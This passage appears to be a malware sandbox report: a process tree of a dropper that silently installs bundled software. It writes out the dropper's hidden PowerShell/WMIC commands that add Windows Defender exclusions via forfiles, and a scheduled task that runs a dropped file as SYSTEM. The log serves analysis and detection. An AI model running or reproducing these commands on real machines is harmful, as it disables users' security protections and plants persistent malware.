                                                                                                4⤵
                                                                                                • Program crash
                                                                                                PID:2964
                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4892 -s 2024
                                                                                                4⤵
                                                                                                • Program crash
                                                                                                PID:5700
                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4892 -s 1896
                                                                                                4⤵
                                                                                                • Program crash
                                                                                                PID:1152
                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4892 -s 1904
                                                                                                4⤵
                                                                                                • Program crash
                                                                                                PID:2148
                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4892 -s 1852
                                                                                                4⤵
                                                                                                • Program crash
                                                                                                PID:3976
                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4892 -s 1752
                                                                                                4⤵
                                                                                                • Program crash
                                                                                                PID:224
                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4892 -s 1856
                                                                                                4⤵
                                                                                                • Program crash
                                                                                                PID:2116
                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4892 -s 1852
                                                                                                4⤵
                                                                                                • Program crash
                                                                                                PID:3888
                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4892 -s 1740
                                                                                                4⤵
                                                                                                • Program crash
                                                                                                PID:5364
                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4892 -s 1668
                                                                                                4⤵
                                                                                                • Program crash
                                                                                                PID:5588
                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4892 -s 1704
                                                                                                4⤵
                                                                                                • Program crash
                                                                                                PID:4056
                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4892 -s 1264
                                                                                                4⤵
                                                                                                • Program crash
                                                                                                PID:5336
                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4892 -s 1672
                                                                                                4⤵
                                                                                                • Program crash
                                                                                                PID:5324
                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4892 -s 1724
                                                                                                4⤵
                                                                                                • Program crash
                                                                                                PID:5512
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                C:\Windows\system32\cmd.exe /c powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\eF6TBZ78\mLtu9LnrWpQF.exe"
                                                                                                4⤵
                                                                                                • System Location Discovery: System Language Discovery
                                                                                                PID:3948
                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\eF6TBZ78\mLtu9LnrWpQF.exe"
                                                                                                  5⤵
                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  PID:4072
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                C:\Windows\system32\cmd.exe /c powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\wsieomoh\LNgZRKry9PM.exe"
                                                                                                4⤵
                                                                                                • System Location Discovery: System Language Discovery
                                                                                                PID:3452
                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\wsieomoh\LNgZRKry9PM.exe"
                                                                                                  5⤵
                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  PID:5700
                                                                                              • C:\Users\Admin\AppData\Local\Temp\eF6TBZ78\mLtu9LnrWpQF.exe
                                                                                                C:\Users\Admin\AppData\Local\Temp\eF6TBZ78\mLtu9LnrWpQF.exe
                                                                                                4⤵
                                                                                                • Executes dropped EXE
                                                                                                • System Location Discovery: System Language Discovery
                                                                                                PID:3748
                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-KNQ3J.tmp\mLtu9LnrWpQF.tmp
                                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-KNQ3J.tmp\mLtu9LnrWpQF.tmp" /SL5="$303CA,3305732,54272,C:\Users\Admin\AppData\Local\Temp\eF6TBZ78\mLtu9LnrWpQF.exe"
                                                                                                  5⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Loads dropped DLL
                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                                  PID:1612
                                                                                                  • C:\Users\Admin\AppData\Local\Duplicate File Finder 5.4.1.6\duplicateff16.exe
                                                                                                    "C:\Users\Admin\AppData\Local\Duplicate File Finder 5.4.1.6\duplicateff16.exe" -i
                                                                                                    6⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Loads dropped DLL
                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                    PID:4384
                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4892 -s 1668
                                                                                                4⤵
                                                                                                • Program crash
                                                                                                PID:5688
                                                                                              • C:\Users\Admin\AppData\Local\Temp\wsieomoh\LNgZRKry9PM.exe
                                                                                                C:\Users\Admin\AppData\Local\Temp\wsieomoh\LNgZRKry9PM.exe --silent --allusers=0
                                                                                                4⤵
                                                                                                • Executes dropped EXE
                                                                                                • System Location Discovery: System Language Discovery
                                                                                                PID:4640
                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS02250338\setup.exe
                                                                                                  C:\Users\Admin\AppData\Local\Temp\7zS02250338\setup.exe --silent --allusers=0 --server-tracking-blob=YTQxMWM4NjhmYjBmYjkyY2FhZTEzN2M5MDBiMDk0NDc2ZWJlZjY3NDZkM2VhYTY0ODNjN2VmOGNiNDA5YWM4YTp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijoib3BlcmEiLCJxdWVyeSI6Ii9vcGVyYS9zdGFibGU/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1PRlQmdXRtX2NhbXBhaWduPTM5MTEzIiwidGltZXN0YW1wIjoiMTc0NDExNzM2Ny4xMTMxIiwidXNlcmFnZW50IjoiTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzExOC4wLjAuMCBTYWZhcmkvNTM3LjM2IiwidXRtIjp7ImNhbXBhaWduIjoiMzkxMTMiLCJtZWRpdW0iOiJhcGIiLCJzb3VyY2UiOiJPRlQifSwidXVpZCI6IjZhYzNmNzMyLTJmMDYtNDFlNi05ZjdkLWE3OWUxN2E0YzljZiJ9
                                                                                                  5⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Loads dropped DLL
                                                                                                  • Enumerates connected drives
                                                                                                  • Modifies system certificate store
                                                                                                  PID:3304
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS02250338\setup.exe
                                                                                                    C:\Users\Admin\AppData\Local\Temp\7zS02250338\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector-2.opera.com/ --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=117.0.5408.197 --initial-client-data=0x340,0x33c,0x344,0x310,0x348,0x7261c284,0x7261c290,0x7261c29c
                                                                                                    6⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Loads dropped DLL
                                                                                                    PID:5484
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\setup.exe
                                                                                                    "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\setup.exe" --version
                                                                                                    6⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Loads dropped DLL
                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                    PID:6080
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS02250338\setup.exe
                                                                                                    "C:\Users\Admin\AppData\Local\Temp\7zS02250338\setup.exe" --backend --install --import-browser-data=0 --enable-crash-reporting=1 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --showunbox=0 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=uk --singleprofile=0 --copyonly=0 --allusers=0 --pintotaskbar=1 --pintostartmenu=0 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=3304 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20250408130251" --session-guid=fc8bbfc4-2eae-4d98-81c8-358bed830f35 --server-tracking-blob=MGExZTNmZWNmYWM1OWFiMDk5ZGUxYmU4YjliMWU0Mzk4YTNkMjc4MmU2YTBjOTA0NjJjMzkzNjliZmM5NzMwNzp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGU/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1PRlQmdXRtX2NhbXBhaWduPTM5MTEzIiwic3lzdGVtIjp7InBsYXRmb3JtIjp7ImFyY2giOiJ4ODZfNjQiLCJvcHN5cyI6IldpbmRvd3MiLCJvcHN5cy12ZXJzaW9uIjoiMTEiLCJwYWNrYWdlIjoiRVhFIn19LCJ0aW1lc3RhbXAiOiIxNzQ0MTE3MzY3LjExMzEiLCJ1c2VyYWdlbnQiOiJNb3ppbGxhLzUuMCAoV2luZG93cyBOVCAxMC4wOyBXaW42NDsgeDY0KSBBcHBsZVdlYktpdC81MzcuMzYgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvMTE4LjAuMC4wIFNhZmFyaS81MzcuMzYiLCJ1dG0iOnsiY2FtcGFpZ24iOiIzOTExMyIsIm1lZGl1bSI6ImFwYiIsInNvdXJjZSI6Ik9GVCJ9LCJ1dWlkIjoiNmFjM2Y3MzItMmYwNi00MWU2LTlmN2QtYTc5ZTE3YTRjOWNmIn0= --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=3006000000000000
                                                                                                    6⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Loads dropped DLL
                                                                                                    • Enumerates connected drives
                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                    PID:1164
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS02250338\setup.exe
                                                                                                      C:\Users\Admin\AppData\Local\Temp\7zS02250338\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector-2.opera.com/ --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=117.0.5408.197 --initial-client-data=0x32c,0x330,0x334,0x308,0x338,0x7159c284,0x7159c290,0x7159c29c
                                                                                                      7⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Loads dropped DLL
                                                                                                      PID:1752
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202504081302511\assistant\Assistant_117.0.5408.35_Setup.exe_sfx.exe
                                                                                                    "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202504081302511\assistant\Assistant_117.0.5408.35_Setup.exe_sfx.exe"
                                                                                                    6⤵
                                                                                                    • Executes dropped EXE
                                                                                                    PID:5728
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202504081302511\assistant\assistant_installer.exe
                                                                                                    "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202504081302511\assistant\assistant_installer.exe" --version
                                                                                                    6⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Loads dropped DLL
                                                                                                    PID:1256
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202504081302511\assistant\assistant_installer.exe
                                                                                                      "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202504081302511\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector-2.opera.com/ --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=117.0.5408.35 --initial-client-data=0x250,0x254,0x258,0x22c,0x25c,0x5d3d24,0x5d3d30,0x5d3d3c
                                                                                                      7⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Loads dropped DLL
                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                      PID:1924
                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4892 -s 1572
                                                                                                4⤵
                                                                                                • Program crash
                                                                                                PID:3992
                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4892 -s 932
                                                                                                4⤵
                                                                                                • Program crash
                                                                                                PID:2156
                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4892 -s 1652
                                                                                                4⤵
                                                                                                • Program crash
                                                                                                PID:5816
                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4892 -s 1568
                                                                                                4⤵
                                                                                                • Program crash
                                                                                                PID:4784
                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4892 -s 1268
                                                                                                4⤵
                                                                                                • Program crash
                                                                                                PID:2720
                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4892 -s 1648
                                                                                                4⤵
                                                                                                • Program crash
                                                                                                PID:6012
                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4892 -s 1964
                                                                                                4⤵
                                                                                                • Program crash
                                                                                                PID:3636
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                C:\Windows\system32\cmd.exe /c powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\JIPSnfVA\lK22kbx3LANBT4Ft3E9d.exe"
                                                                                                4⤵
                                                                                                • System Location Discovery: System Language Discovery
                                                                                                PID:972
                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\JIPSnfVA\lK22kbx3LANBT4Ft3E9d.exe"
                                                                                                  5⤵
                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  PID:4356
                                                                                              • C:\Users\Admin\AppData\Local\Temp\JIPSnfVA\lK22kbx3LANBT4Ft3E9d.exe
                                                                                                C:\Users\Admin\AppData\Local\Temp\JIPSnfVA\lK22kbx3LANBT4Ft3E9d.exe /did=757674 /S
                                                                                                4⤵
                                                                                                • Checks BIOS information in registry
                                                                                                • Executes dropped EXE
                                                                                                • System Location Discovery: System Language Discovery
                                                                                                • Enumerates system info in registry
                                                                                                PID:1512
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=dll Force=True" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True" &
                                                                                                  5⤵
                                                                                                  • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                  PID:5604
                                                                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                                                                    forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
                                                                                                    6⤵
                                                                                                    • Indirect Command Execution
                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                    PID:4564
                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                      /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                                                      7⤵
                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                      PID:1160
                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                                                        8⤵
                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                        PID:1924
                                                                                                        • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                          "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                                                          9⤵
                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                          PID:2720
                                                                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                                                                    forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=dll Force=True"
                                                                                                    6⤵
                                                                                                    • Indirect Command Execution
                                                                                                    PID:3636
                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                      /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=dll Force=True
                                                                                                      7⤵
                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                      PID:2220
                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=dll Force=True
                                                                                                        8⤵
                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                        PID:5264
                                                                                                        • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                          "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=dll Force=True
                                                                                                          9⤵
                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                          PID:4972
                                                                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                                                                    forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True"
                                                                                                    6⤵
                                                                                                    • Indirect Command Execution
                                                                                                    PID:4616
                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                      /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                                                                                                      7⤵
                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                      PID:3992
                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                                                                                                        8⤵
                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                        PID:5364
                                                                                                        • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                          "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                                                                                                          9⤵
                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                          PID:5448
                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                  schtasks /CREATE /TN "blYRyfJsEBqtfUQpPT" /SC once /ST 13:04:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\lOiFxebpMgzycibAx\RLXyqGHcGPtHCEz\SdFyzvP.exe\" 9M /UJHdidrzEk 757674 /S" /V1 /F
                                                                                                  5⤵
                                                                                                  • Drops file in Windows directory
                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                  PID:6128
                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4892 -s 1764
                                                                                                4⤵
                                                                                                • Program crash
                                                                                                PID:5528
                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4892 -s 1964
                                                                                                4⤵
                                                                                                • Program crash
                                                                                                PID:2268
                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 352 -p 4892 -ip 4892
                                                                                          1⤵
                                                                                            PID:4360
                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 4892 -ip 4892
                                                                                            1⤵
                                                                                              PID:4736
                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 4892 -ip 4892
                                                                                              1⤵
                                                                                                PID:3804
                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 4892 -ip 4892
                                                                                                1⤵
                                                                                                  PID:2764
                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 4892 -ip 4892
                                                                                                  1⤵
                                                                                                    PID:2028
                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 4892 -ip 4892
                                                                                                    1⤵
                                                                                                      PID:1664
                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 4892 -ip 4892
                                                                                                      1⤵
                                                                                                        PID:2540
                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 4892 -ip 4892
                                                                                                        1⤵
                                                                                                          PID:4640
                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 4892 -ip 4892
                                                                                                          1⤵
                                                                                                            PID:4228
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 4892 -ip 4892
                                                                                                            1⤵
                                                                                                              PID:5592
                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 4892 -ip 4892
                                                                                                              1⤵
                                                                                                                PID:3044
                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 4892 -ip 4892
                                                                                                                1⤵
                                                                                                                  PID:5668
                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 4892 -ip 4892
                                                                                                                  1⤵
                                                                                                                    PID:5976
                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 4892 -ip 4892
                                                                                                                    1⤵
                                                                                                                      PID:880
                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 4892 -ip 4892
                                                                                                                      1⤵
                                                                                                                        PID:1448
                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 4892 -ip 4892
                                                                                                                        1⤵
                                                                                                                          PID:2800
                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 4892 -ip 4892
                                                                                                                          1⤵
                                                                                                                            PID:3868
                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 4892 -ip 4892
                                                                                                                            1⤵
                                                                                                                              PID:2344
                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 4892 -ip 4892
                                                                                                                              1⤵
                                                                                                                                PID:4772
                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 4892 -ip 4892
                                                                                                                                1⤵
                                                                                                                                  PID:2580
                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 4892 -ip 4892
                                                                                                                                  1⤵
                                                                                                                                    PID:1160
                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 4892 -ip 4892
                                                                                                                                    1⤵
                                                                                                                                      PID:5660
                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 4892 -ip 4892
                                                                                                                                      1⤵
                                                                                                                                        PID:5272
                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 4892 -ip 4892
                                                                                                                                        1⤵
                                                                                                                                          PID:3272
                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 4892 -ip 4892
                                                                                                                                          1⤵
                                                                                                                                            PID:5608
                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 4892 -ip 4892
                                                                                                                                            1⤵
                                                                                                                                              PID:3304
                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 4892 -ip 4892
                                                                                                                                              1⤵
                                                                                                                                                PID:5348
                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 4892 -ip 4892
                                                                                                                                                1⤵
                                                                                                                                                  PID:5340
                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 4892 -ip 4892
                                                                                                                                                  1⤵
                                                                                                                                                    PID:5820
                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 4892 -ip 4892
                                                                                                                                                    1⤵
                                                                                                                                                      PID:5032
